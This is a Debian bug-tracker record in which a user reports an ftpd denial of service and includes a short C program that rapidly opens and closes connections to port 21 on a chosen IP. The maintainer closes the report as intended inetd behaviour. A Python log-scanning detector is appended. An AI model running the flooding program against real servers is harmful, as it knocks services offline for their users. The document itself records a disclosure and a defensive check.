Your message dated Wed, 13 Jul 2005 22:13:13 +0200
with message-id <[EMAIL PROTECTED]>
and subject line Bug#318144: ftpd remote DoS
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 13 Jul 2005 18:51:25 +0000
From [EMAIL PROTECTED] Wed Jul 13 11:51:25 2005
Return-path: <[EMAIL PROTECTED]>
Received: from wproxy.gmail.com [64.233.184.204] 
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1DsmKK-0005VH-00; Wed, 13 Jul 2005 11:51:24 -0700
Received: by wproxy.gmail.com with SMTP id i5so255994wra
        for <[EMAIL PROTECTED]>; Wed, 13 Jul 2005 11:51:23 -0700 (PDT)
Received: by 10.54.57.62 with SMTP id f62mr411654wra;
        Wed, 13 Jul 2005 11:50:16 -0700 (PDT)
Received: by 10.54.95.11 with HTTP; Wed, 13 Jul 2005 11:50:15 -0700 (PDT)
Message-ID: <[EMAIL PROTECTED]>
Date: Wed, 13 Jul 2005 11:50:15 -0700
From: Cameron Eure <[EMAIL PROTECTED]>
Reply-To: Cameron Eure <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: ftpd remote DoS
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 

Package: ftpd
Status: install ok installed
Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
Architecture: i386
Version: 0.17-21

I'm currently running Debian testing with a few packages from unstable.

I've discovered a vulnerability which would allow a remote denial of
service attack in the ftpd program. It is caused by someone rapidly
opening a socket, connecting to the server, then closing the socket, and
I've written a small example which can be examined below.

Here's a timeline of what an attack might look like:

* program rapidly opens a socket, connect()'s, then closes the socket
* inetd redundantly reports: in.ftpd: connect from [host]
* inetd, then, reports the message: ftp/tcp server failing (looping),
service terminated

* existing connections continue to work, however,
* since ftpd is down, no new connections can be established

* after about ten minutes, ftpd is restarted


As promised, here's an example program. This will attempt to use the
first argument as an IP address if one is supplied, otherwise it will
use 127.0.0.1.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>


int sock;
struct sockaddr_in addr;


void open_socket()
{
    sock = socket(AF_INET, SOCK_STREAM, 0);

    if ( connect(sock, (struct sockaddr *)&addr, sizeof (struct sockaddr)) < 0 )
    {
        fprintf(stderr, "Error\n");
        close(sock);
        exit(1);
    }
}


int main(int argc, char * argv[])
{
    char * address = "127.0.0.1";
    int port = 21;

    if (argc == 2)
        address = argv[1];

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(address);
    addr.sin_port = htons(port);

    int over = 0;
    printf("Assaulting server\n");

    while (over < 100)
    {
        open_socket();
        close(sock);

        over++;
    }

    return 0;
}

---------------------------------------
Received: (at 318144-close) by bugs.debian.org; 13 Jul 2005 20:15:18 +0000
From [EMAIL PROTECTED] Wed Jul 13 13:15:18 2005
Return-path: <[EMAIL PROTECTED]>
Received: from smtp-2.hut.fi [130.233.228.92] 
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1DsndV-00068I-00; Wed, 13 Jul 2005 13:15:17 -0700
Received: from localhost (katosiko.hut.fi [130.233.228.115])
        by smtp-2.hut.fi (8.12.10/8.12.10) with ESMTP id j6DKEk8Y009676;
        Wed, 13 Jul 2005 23:14:46 +0300
Received: from smtp-2.hut.fi ([130.233.228.92])
 by localhost (katosiko.hut.fi [130.233.228.115]) (amavisd-new, port 10024)
 with LMTP id 05696-34-7; Wed, 13 Jul 2005 23:14:45 +0300 (EEST)
Received: from var.inittab.org (a130-233-5-72.debconf5.hut.fi [130.233.5.72])
        by smtp-2.hut.fi (8.12.10/8.12.10) with ESMTP id j6DKCIte008938;
        Wed, 13 Jul 2005 23:12:34 +0300
Received: by var.inittab.org (Postfix, from userid 1000)
        id C4C7C18001025; Wed, 13 Jul 2005 22:13:13 +0200 (CEST)
Date: Wed, 13 Jul 2005 22:13:13 +0200
From: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
To: Cameron Eure <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: Bug#318144: ftpd remote DoS
Message-ID: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
In-Reply-To: <[EMAIL PROTECTED]>
User-Agent: Mutt/1.5.9i
X-TKK-Virus-Scanned: by amavisd-new-2.1.2-hutcc at katosiko.hut.fi
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by smtp-2.hut.fi id
        j6DKEk8Y009676
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 
X-CrossAssassin-Score: 2

On Wed, Jul 13, 2005 at 11:50:15AM -0700, Cameron Eure wrote:
> Package: ftpd
> Status: install ok installed
> Maintainer: Alberto Gonzalez Iniesta <[EMAIL PROTECTED]>
> Architecture: i386
> Version: 0.17-21
>
> I'm currently running Debian testing with a few packages from unstable.
>
> I've discovered a vulnerability which would allow a remote denial of
> service attack in the ftpd program. It is caused by someone rapidly
> opening a socket, connecting to the server, then closing the socket, and
> I've written a small example which can be examined below.
>
> Here's a timeline of what an attack might look like:
>
> * program rapidly opens a socket, connect()'s, then closes the socket
> * inetd redundantly reports: in.ftpd: connect from [host]
> * inetd, then, reports the message: ftp/tcp server failing (looping),
> service terminated

Right, that's not a bug. It's a feature. And it (as your logs say) is a
*inetd* feature, nothing to do with the ftpd server.
Take a look at the inetd docs and you'll see how to control that
feature.

Closing it.

Regards,

Alberto

-- 
Alberto Gonzalez Iniesta    | Training, consulting and technical support
agi@(inittab.org|debian.org)| for GNU/Linux and free software
Encrypted mail preferred    | http://inittab.com

Key fingerprint = 9782 04E7 2B75 405C F5E9  0C81 C514 AF8E 4BA4 01C3
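
Added example, not part of either message above and not Debian's or inetd's own code: a log check for the sequence described in the report, a burst of "in.ftpd: connect from" lines from one host followed by inetd's "server failing (looping), service terminated" message. The syslog prefix layout, the 40-per-60-seconds threshold and all sample hosts and PIDs are assumptions and constructed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed classic syslog layout: "Mon DD HH:MM:SS host prog[pid]: message"
CONNECT = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ in\.ftpd\[\d+\]: connect from (\S+)")
LOOPING = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ inetd\[\d+\]: (\S+) server failing \(looping\)")

def parse_ts(text, year=2005):
    # Classic syslog timestamps carry no year, so one is supplied.
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def scan(lines, burst=40, window=timedelta(seconds=60)):
    """Return (burst_sources, outages).

    burst_sources: hosts with more than `burst` connects inside `window`
                   (assumed threshold; set it to your inetd's spawn limit).
    outages: (timestamp, service) for each inetd "looping" shutdown.
    """
    recent = defaultdict(deque)          # host -> timestamps inside the window
    burst_sources, outages = set(), []
    for line in lines:
        m = CONNECT.match(line)
        if m:
            ts, host = parse_ts(m.group(1)), m.group(2)
            q = recent[host]
            q.append(ts)
            while ts - q[0] > window:    # slide the window forward
                q.popleft()
            if len(q) > burst:
                burst_sources.add(host)
            continue
        m = LOOPING.match(line)
        if m:
            outages.append((parse_ts(m.group(1)), m.group(2)))
    return burst_sources, outages

def constructed_log():
    # Constructed sample: one ordinary client, 45 connects in 5 s, then inetd's message.
    lines = ["Jul 13 11:40:01 host in.ftpd[2101]: connect from 192.0.2.10"]
    for i in range(45):
        lines.append(f"Jul 13 11:50:{15 + i // 9:02d} host in.ftpd[{2200 + i}]: "
                     "connect from 198.51.100.7")
    lines.append("Jul 13 11:50:20 host inetd[412]: ftp/tcp server failing (looping), "
                 "service terminated")
    return lines

if __name__ == "__main__":
    sources, outages = scan(constructed_log())
    print("burst sources:", sorted(sources))
    for ts, service in outages:
        print("inetd stopped", service, "at", ts)
```
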

